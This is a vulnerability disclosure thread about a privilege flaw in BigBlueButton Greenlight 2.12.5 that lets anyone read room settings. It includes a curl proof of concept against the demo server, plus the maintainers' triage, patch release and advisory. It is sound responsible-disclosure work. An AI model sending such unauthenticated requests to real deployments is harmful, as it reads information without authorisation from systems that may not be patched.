Improper privilege management - Anyone can view room settings. in bigbluebutton/greenlight
Reported on
May 22nd 2022
Description
Hi bigbluebutton maintainers, I would like to report an improper privilege management, this allows anyone to view any room settings.
Proof of Concept
- To demonstrate the vulnerability, I've created a room
https://demo.bigbluebutton.org/gl/hoa-j4s-sxx-5gn - Run this curl command to get the room settings
curl -i -s -k -X $'GET' \
-H $'Host: demo.bigbluebutton.org' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Dnt: 1' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Te: trailers' -H $'Connection: close' \
$'https://demo.bigbluebutton.org/gl/hoa-j4s-sxx-5gn/room_settings'
The response looks like
{"muteOnStart":false,"requireModeratorApproval":true,"anyoneCanStart":false,"joinModerator":false,"recording":false}
- Note that there is no token/secret in the above curl command
Impact
Allowing anyone to view any room settings
Hi @xiviu!
Thank you for reporting this!!
Overall you are spot-on with your finding about the issue and how to trigger it. However, it is part of a different component of BigBlueButton.
Could you please tweak this (or re-open it) towards GreenLight -- https://github.com/bigbluebutton/greenlight version 2.12.5
For "Occurence" you could point to https://github.com/bigbluebutton/greenlight/blob/master/app/controllers/rooms_controller.rb#L316
Please tweak it so that when we patch it the fix link is to the tagetted project. Much appreciated!
-Anton
Hi @xiviu, Please open a new report but use https://github.com/bigbluebutton/greenlight version 2.12.5 instead of https://github.com/bigbluebutton/bigbluebutton
For "Occurence" you could point to https://github.com/bigbluebutton/greenlight/blob/master/app/controllers/rooms_controller.rb#L316 instead of the current https://github.com/bigbluebutton/bigbluebutton/blob/52e302c28a6bd799762420e3076a92ba11bbaea9/bigbluebutton-html5/imports/ui/components/audio/container.jsx#L23
Once you open the new (more accurate) report we can close this one.
Thanks again! -Anton
@antobinary - sorted 👍
The report is now pointing to the greenlight repository and I have updated the occurrence to your suggestion :)
Let me know if you have any further questions or issues!
Thanks @xiviu for the report! Thanks @Jamie for applying the tweaks to the report!
We confirm this is a an issue with GreenLight <=2.12.5 and we're looking into patching it.
Upon further investigation the actual severity is Low though, the information that could be revealed to the world is just a few settings related to the meeting. No ids, no secrets, no user data etc. We are still going to patch it, of course.
We have created a GitHub Security Advisory (private for the moment, will be published after the patch has been released, and after some time was provided for administrators to upgrade.) That advisory will have a CVE associated with, so no need to duplicate this here.
Hi @xiviu,
We have fixed the issue via https://github.com/bigbluebutton/greenlight/pull/3508 and released a patch - https://github.com/bigbluebutton/greenlight/releases/tag/release-2.12.6
On June 17 (in 3 days) we will be in a position to mark this as fixed. We provided a few days to our community to upgrade their GreenLight to the patched version.
We have made public the security advisory - https://github.com/bigbluebutton/greenlight/security/advisories/GHSA-phh8-3v6v-7498